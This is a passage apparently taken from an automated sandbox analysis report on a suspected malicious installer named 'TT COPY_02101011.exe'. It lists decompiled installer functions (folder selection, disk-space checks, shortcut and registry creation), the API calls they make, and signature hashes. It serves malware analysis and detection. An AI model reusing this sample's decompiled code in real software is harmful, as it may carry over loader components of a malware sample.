                                                								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                									_t153 = _a8;
                                                									goto L37;
                                                								} else {
                                                									_t163 = 0x400;
                                                									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                									_v12 = 1;
                                                									goto L38;
                                                								}
                                                							} else {
                                                								if(0 == 0x428fa0) {
                                                									L30:
                                                									_t145 = 0;
                                                									goto L31;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
                                                									if(_t113 != 0) {
                                                										break;
                                                									}
                                                									if(_t145 != 0) {
                                                										 *_t145 =  *_t145 & _t113;
                                                									}
                                                									_t145 = E00405465(0x428fa0) - 1;
                                                									 *_t145 = 0x5c;
                                                									if(_t145 != 0x428fa0) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                								_v12 = 1;
                                                								_t145 = 0;
                                                								L37:
                                                								_t163 = 0x400;
                                                								L38:
                                                								_t94 = E0040456B(5);
                                                								if(_v12 != _t145 && _t153 < _t94) {
                                                									_v8 = 2;
                                                								}
                                                								_t147 =  *0x42e33c; // 0x5770b8
                                                								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                                									E004044B6(0x3ff, 0xfffffffb, _t94);
                                                									if(_v12 == _t145) {
                                                										SetDlgItemTextA(_a4, _t163, 0x428f90);
                                                									} else {
                                                										E004044B6(_t163, 0xfffffffc, _t153);
                                                									}
                                                								}
                                                								_t95 = _v8;
                                                								 *0x42ec04 = _t95;
                                                								if(_t95 == _t145) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v36 + 0x14) & _t163) != 0) {
                                                									_v8 = _t145;
                                                								}
                                                								E00403CFF(0 | _v8 == _t145);
                                                								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
                                                									E004040B0();
                                                								}
                                                								 *0x429fc4 = _t145;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t180 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t117 = _a12 & 0x0000ffff;
                                                					if(_t117 != 0x3fb) {
                                                						L12:
                                                						if(_t117 == 0x3e9) {
                                                							_t148 = 7;
                                                							memset( &_v72, 0, _t148 << 2);
                                                							_v76 = _a4;
                                                							_v68 = 0x429fd8;
                                                							_v56 = E00404450;
                                                							_v52 = _t162;
                                                							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
                                                							_t122 =  &_v76;
                                                							_v60 = 0x41;
                                                							__imp__SHBrowseForFolderA(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E0040541E(_t162);
                                                								_t124 =  *0x42eb70; // 0x571350
                                                								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
                                                									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
                                                										lstrcatA(_t162, 0x42db00);
                                                									}
                                                								}
                                                								 *0x429fc4 =  &(( *0x429fc4)[0]);
                                                								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t159 = _a4;
                                                					_v12 = GetDlgItem(_t159, 0x3fb);
                                                					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
                                                						E0040541E(_t162);
                                                					}
                                                					 *0x42e338 = _t159;
                                                					SetWindowTextA(_v12, _t162);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00403CDD(_t159);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00403CDD(_t159);
                                                					E00403D12(_v12);
                                                					_t138 = E00405C49(7);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E00403D44(_a8, _a12, _a16);
                                                					}
                                                					 *_t138(_v12, 1);
                                                					goto L8;
                                                				}
                                                			}


                                                APIs
                                                • GetDlgItem.USER32 ref: 00404167
                                                • SetWindowTextA.USER32(?,?), ref: 00404194
                                                • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                                • lstrcmpiA.KERNEL32(tduolivt,00429FD8,00000000,?,?), ref: 00404286
                                                • lstrcatA.KERNEL32(?,tduolivt), ref: 00404292
                                                • SetDlgItemTextA.USER32 ref: 004042A2
                                                  • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                  • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                                • SetDlgItemTextA.USER32 ref: 004043EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                • String ID: A$C:\Users\user\AppData\Local\Temp$tduolivt
                                                • API String ID: 2246997448-1953168327
                                                • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                                • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				struct _ITEMIDLIST* _v12;
                                                				signed int _v16;
                                                				signed char _v20;
                                                				signed char _v24;
                                                				signed int _v28;
                                                				signed int _t36;
                                                				CHAR* _t37;
                                                				signed char _t39;
                                                				signed int _t40;
                                                				int _t41;
                                                				char _t51;
                                                				char _t52;
                                                				char _t54;
                                                				char _t56;
                                                				void* _t64;
                                                				signed int _t68;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				signed char _t74;
                                                				intOrPtr _t77;
                                                				char _t81;
                                                				void* _t83;
                                                				CHAR* _t84;
                                                				void* _t86;
                                                				signed int _t93;
                                                				signed int _t95;
                                                				void* _t96;
                                                
                                                				_t86 = __esi;
                                                				_t83 = __edi;
                                                				_t64 = __ebx;
                                                				_t36 = _a8;
                                                				if(_t36 < 0) {
                                                					_t77 =  *0x42e33c; // 0x5770b8
                                                					_t36 =  *(_t77 - 4 + _t36 * 4);
                                                				}
                                                				_t72 =  *0x42eb98; // 0x575ac0
                                                				_t73 = _t72 + _t36;
                                                				_t37 = 0x42db00;
                                                				_push(_t64);
                                                				_push(_t86);
                                                				_push(_t83);
                                                				_t84 = 0x42db00;
                                                				if(_a4 - 0x42db00 < 0x800) {
                                                					_t84 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				while(1) {
                                                					_t81 =  *_t73;
                                                					if(_t81 == 0) {
                                                						break;
                                                					}
                                                					__eflags = _t84 - _t37 - 0x400;
                                                					if(_t84 - _t37 >= 0x400) {
                                                						break;
                                                					}
                                                					_t73 = _t73 + 1;
                                                					__eflags = _t81 - 0xfc;
                                                					_a8 = _t73;
                                                					if(__eflags <= 0) {
                                                						if(__eflags != 0) {
                                                							 *_t84 = _t81;
                                                							_t84 =  &(_t84[1]);
                                                							__eflags = _t84;
                                                						} else {
                                                							 *_t84 =  *_t73;
                                                							_t84 =  &(_t84[1]);
                                                							_t73 = _t73 + 1;
                                                						}
                                                						continue;
                                                					}
                                                					_t39 =  *(_t73 + 1);
                                                					_t74 =  *_t73;
                                                					_a8 = _a8 + 2;
                                                					_v20 = _t39;
                                                					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                                					_t68 = _t74;
                                                					_t40 = _t39 | 0x00000080;
                                                					__eflags = _t81 - 0xfe;
                                                					_v28 = _t68;
                                                					_v24 = _t74 | 0x00000080;
                                                					_v16 = _t40;
                                                					if(_t81 != 0xfe) {
                                                						__eflags = _t81 - 0xfd;
                                                						if(_t81 != 0xfd) {
                                                							__eflags = _t81 - 0xff;
                                                							if(_t81 == 0xff) {
                                                								__eflags = (_t40 | 0xffffffff) - _t93;
                                                								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                                							}
                                                							L41:
                                                							_t41 = lstrlenA(_t84);
                                                							_t73 = _a8;
                                                							_t84 =  &(_t84[_t41]);
                                                							_t37 = 0x42db00;
                                                							continue;
                                                						}
                                                						__eflags = _t93 - 0x1d;
                                                						if(_t93 != 0x1d) {
                                                							__eflags = (_t93 << 0xa) + 0x42f000;
                                                							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
                                                						} else {
                                                							E00405889(_t84,  *0x42eb68);
                                                						}
                                                						__eflags = _t93 + 0xffffffeb - 7;
                                                						if(_t93 + 0xffffffeb < 7) {
                                                							L32:
                                                							E00405B89(_t84);
                                                						}
                                                						goto L41;
                                                					}
                                                					_t95 = 2;
                                                					_t51 = GetVersion();
                                                					__eflags = _t51;
                                                					if(_t51 >= 0) {
                                                						L12:
                                                						_v8 = 1;
                                                						L13:
                                                						__eflags =  *0x42ebe4;
                                                						if( *0x42ebe4 != 0) {
                                                							_t95 = 4;
                                                						}
                                                						__eflags = _t68;
                                                						if(_t68 >= 0) {
                                                							__eflags = _t68 - 0x25;
                                                							if(_t68 != 0x25) {
                                                								__eflags = _t68 - 0x24;
                                                								if(_t68 == 0x24) {
                                                									GetWindowsDirectoryA(_t84, 0x400);
                                                									_t95 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t95;
                                                									if(_t95 == 0) {
                                                										goto L29;
                                                									}
                                                									_t52 =  *0x42eb64; // 0x73951340
                                                									_t95 = _t95 - 1;
                                                									__eflags = _t52;
                                                									if(_t52 == 0) {
                                                										L25:
                                                										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                                										__eflags = _t54;
                                                										if(_t54 != 0) {
                                                											L27:
                                                											 *_t84 =  *_t84 & 0x00000000;
                                                											__eflags =  *_t84;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListA(_v12, _t84);
                                                										__imp__CoTaskMemFree(_v12);
                                                										__eflags = _t54;
                                                										if(_t54 != 0) {
                                                											goto L29;
                                                										}
                                                										goto L27;
                                                									}
                                                									__eflags = _v8;
                                                									if(_v8 == 0) {
                                                										goto L25;
                                                									}
                                                									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                                									__eflags = _t56;
                                                									if(_t56 == 0) {
                                                										goto L29;
                                                									}
                                                									goto L25;
                                                								}
                                                								goto L29;
                                                							}
                                                							GetSystemDirectoryA(_t84, 0x400);
                                                							goto L29;
                                                						} else {
                                                							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
                                                							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
                                                							__eflags =  *_t84;
                                                							if( *_t84 != 0) {
                                                								L30:
                                                								__eflags = _v20 - 0x1a;
                                                								if(_v20 == 0x1a) {
                                                									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L32;
                                                							}
                                                							E0040594D(_t71, _t84, _t95, _t84, _v20);
                                                							L29:
                                                							__eflags =  *_t84;
                                                							if( *_t84 == 0) {
                                                								goto L32;
                                                							}
                                                							goto L30;
                                                						}
                                                					}
                                                					__eflags = _t51 - 0x5a04;
                                                					if(_t51 == 0x5a04) {
                                                						goto L12;
                                                					}
                                                					__eflags = _v20 - 0x23;
                                                					if(_v20 == 0x23) {
                                                						goto L12;
                                                					}
                                                					__eflags = _v20 - 0x2e;
                                                					if(_v20 == 0x2e) {
                                                						goto L12;
                                                					} else {
                                                						_v8 = _v8 & 0x00000000;
                                                						goto L13;
                                                					}
                                                				}
                                                				 *_t84 =  *_t84 & 0x00000000;
                                                				if(_a4 == 0) {
                                                					return _t37;
                                                				}
                                                				return E0040592B(_a4, _t37);
                                                			}


                                                APIs
                                                • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                                • GetSystemDirectoryA.KERNEL32(tduolivt,00000400), ref: 00405A6C
                                                • GetWindowsDirectoryA.KERNEL32(tduolivt,00000400), ref: 00405A7F
                                                • SHGetSpecialFolderLocation.SHELL32(?,0041F4C3), ref: 00405ABB
                                                • SHGetPathFromIDListA.SHELL32(0041F4C3,tduolivt), ref: 00405AC9
                                                • CoTaskMemFree.OLE32(0041F4C3), ref: 00405AD4
                                                • lstrcatA.KERNEL32(tduolivt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                                • lstrlenA.KERNEL32(tduolivt,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$tduolivt
                                                • API String ID: 900638850-525257407
                                                • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                                • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 10001008
                                                • HeapAlloc.KERNEL32(00000000), ref: 1000100F
                                                • RegCreateKeyExW.ADVAPI32(80000002,10000000,00000000,00000000,00000000,0002001F,00000000,-00000007,00000000), ref: 10001058
                                                • GetProcessHeap.KERNEL32(00000000,00000001), ref: 10001068
                                                • HeapFree.KERNEL32(00000000), ref: 1000106F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$Process$AllocCreateFree
                                                • String ID: returning %p
                                                • API String ID: 3034372947-1981732286
                                                • Opcode ID: 195fbd302a5502808bbb0f915bb3c74edd391885523b5e710c5eca80e197fc54
                                                • Instruction ID: c383ed9c32cf044096f4602c524c15cf0f6a047cdac8273018d52cf608840695
                                                • Opcode Fuzzy Hash: 195fbd302a5502808bbb0f915bb3c74edd391885523b5e710c5eca80e197fc54
                                                • Instruction Fuzzy Hash: B6112174640208FFF710CFA4CD49FA977B4EB49745F208048FA09AB296C6B5EE809B54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E00402012() {
                                                				void* _t44;
                                                				intOrPtr* _t48;
                                                				intOrPtr* _t50;
                                                				intOrPtr* _t52;
                                                				intOrPtr* _t54;
                                                				signed int _t58;
                                                				intOrPtr* _t59;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t69;
                                                				intOrPtr* _t71;
                                                				int _t75;
                                                				signed int _t81;
                                                				intOrPtr* _t88;
                                                				void* _t95;
                                                				void* _t96;
                                                				void* _t100;
                                                
                                                				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                                				_t96 = E004029E8(0xffffffdf);
                                                				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                                				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                                				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                                				if(E0040548B(_t96) == 0) {
                                                					E004029E8(0x21);
                                                				}
                                                				_t44 = _t100 + 8;
                                                				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                                                				if(_t44 < _t75) {
                                                					L13:
                                                					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                                                					if(_t95 >= _t75) {
                                                						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                						_t81 =  *(_t100 - 0x14);
                                                						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                						if(_t58 != 0) {
                                                							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                							_t81 =  *(_t100 - 0x14);
                                                						}
                                                						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                                							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                                						}
                                                						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                						if(_t95 >= _t75) {
                                                							_t95 = 0x80004005;
                                                							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
                                                								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                                								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
                                                							}
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                                						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                					}
                                                					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                					if(_t95 >= _t75) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
                                                				return 0;
                                                			}


                                                APIs
                                                • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 123533781-47812868
                                                • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                                • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,1000DD34,?,?,?,?), ref: 1000EDD6
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 1000EDDF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 214e33ba25129c4f1801553cfac652c7af5a3a04dc081072cbe240b3bfcd4292
                                                • Instruction ID: 475294280d45927d435d88e39f52e4d2d8a09b9ce8b8de7cc260de07cd6ecf34
                                                • Opcode Fuzzy Hash: 214e33ba25129c4f1801553cfac652c7af5a3a04dc081072cbe240b3bfcd4292
                                                • Instruction Fuzzy Hash: 7CB09231044218EBEB022B91DC49B983FA8EB0A772F008190F60D46064CB7295948AA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E00402630(char __ebx, char* __edi, char* __esi) {
                                                				void* _t19;
                                                
                                                				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                                					E00405889(__edi, _t6);
                                                					_push(_t19 - 0x178);
                                                					_push(__esi);
                                                					E0040592B();
                                                				} else {
                                                					 *__edi = __ebx;
                                                					 *__esi = __ebx;
                                                					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
                                                				return 0;
                                                			}





                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                                • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 7f24b4d4614ce05863261d46bd76723d78ebcd264821c7613c8cf7d6535b7002
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: D8C150322091930AEB5DD779843453EBEE19B926F132B076FD8B3CB5D8EE20D564D620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: 7b98b3cb7c96b7a21b38511c5c5e5b9957138209cd7cb5ad6140e57c3a367eec
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: 3BC150362091930AEB5DD779843453EBEE19B926F132B076FD8B7CB5D8EE20C524D620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00406043(signed int __ebx, signed int* __esi) {
                                                				signed int _t396;
                                                				signed int _t425;
                                                				signed int _t442;
                                                				signed int _t443;
                                                				signed int* _t446;
                                                				void* _t448;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t446 = __esi;
